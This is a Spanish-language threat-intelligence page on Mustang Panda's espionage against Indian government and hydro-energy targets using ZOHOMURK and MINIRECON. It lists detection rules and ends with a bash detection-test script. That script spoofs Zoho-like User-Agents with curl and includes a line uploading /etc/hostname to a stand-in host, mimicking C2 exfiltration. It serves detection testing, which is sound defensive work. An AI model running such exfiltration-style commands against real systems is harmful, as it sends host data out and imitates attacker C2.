Mustang Panda utiliza ZOHOMURK y MINIRECON contra los sectores gubernamental y energético de India
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Mustang Panda está llevando a cabo operaciones de espionaje dirigidas al gobierno de India y a sectores hidroeléctricos. El grupo está utilizando un kit de herramientas de malware actualizado que incluye SHARDLOADER, MINIRECON y ZOHOMURK. Una de sus técnicas notables es el abuso de Zoho WorkDrive para comando y control y exfiltración de datos.
Investigación
Acronis TRU identificó dos campañas paralelas que usaron señuelos de spear-phishing con temáticas sobre la cooperación India-Taiwán. Los investigadores encontraron la carga lateral de DLL a través de binarios legítimos de Solid PDF Creator y analizaron los nuevos implantes ZOHOMURK y MINIRECON. La investigación también se llevó a cabo en coordinación con CERT-In para apoyar acciones defensivas.
Mitigación
Las organizaciones deben monitorear la actividad inusual que involucre plataformas en la nube, especialmente el uso no autorizado de Zoho WorkDrive. Las soluciones EDR y XDR deben ajustarse para detectar la carga lateral de DLL y persistencia sospechosa basada en el registro. También es esencial tener visibilidad en procesos no-navegador que hagan conexiones HTTPS o WebSocket a servicios en la nube.
Respuesta
Si se detecta esta actividad, los sistemas afectados deben ser aislados inmediatamente para detener más exfiltración a través de APIs en la nube. Los investigadores deben realizar un análisis forense en rutas de staging como C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Las claves del registro Run y las tareas programadas también deben revisarse para detectar persistencia no autorizada.
Flujo de Ataque
Detecciones
Tarea Programada Sospechosa (vía auditoría)
Ver
Puntos Posibles de Persistencia [ASEPs – Software/NTUSER Hive] (vía evento_registry)
Ver
Archivos Sospechosos en Perfil de Usuario Público (vía evento_archivo)
Ver
Detección de Comunicación C2 de Mustang Panda MINIRECON y ZOHOMURK [Conexión en Red de Windows]
Ver
Detección de Comando y Control de Mustang Panda ZOHOMURK [Proxy]
Ver
Detección de Mecanismos de Persistencia de Mustang Panda en Ataques al Sector Indio [Evento del Registro de Windows]
Ver
Ejecución de Simulación
Requisito previo: El Chequeo Pre-vuelo de Telemetría y Línea Base debe haberse aprobado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.
-
Narrativa de Ataque y Comandos: El adversario ha establecido exitosamente un punto de apoyo y está intentando iniciar comunicaciones de Comando y Control (C2). Para hacerse pasar por tráfico comercial legítimo, el implante ZOHOMURK intenta comunicarse con su controlador simulando llamadas de API de Zoho WorkDrive. El atacante usa una cadena de User-Agent específica y codificada (
Zoho Client/1.0) para pasar a través de ciertos filtros de red, esperando mezclarse con el tráfico legítimo de productividad en la nube. Esta acción generará una entrada de registro de proxy que contiene el User-Agent objetivo, activando así la regla de detección. -
Script de Prueba de Regresión:
#!/bin/bash # Simulación de C2 de ZOHOMURK mediante suplantación de User-Agent # Objetivo 1: Imitación de Zoho Client echo "[+] Simulando ZOHOMURK: Zoho Client/1.0" curl -A "Zoho Client/1.0" http://example.com/api/v1/sync # Objetivo 2: Imitación de IPFetcher echo "[+] Simulando ZOHOMURK: IPFetcher/1.0" curl -A "IPFetcher/1.0" http://example.com/checkip # Objetivo 3: Imitación de User-Agent de POST Multipart echo "[+] Simulando ZOHOMURK: Multipart POST" curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload -
Comandos de Limpieza:
# No se crean artefactos persistentes en el sistema mediante esta simulación basada en red. # Simplemente asegúrese de que no haya procesos de curl en segundo plano ejecutándose. pkill curl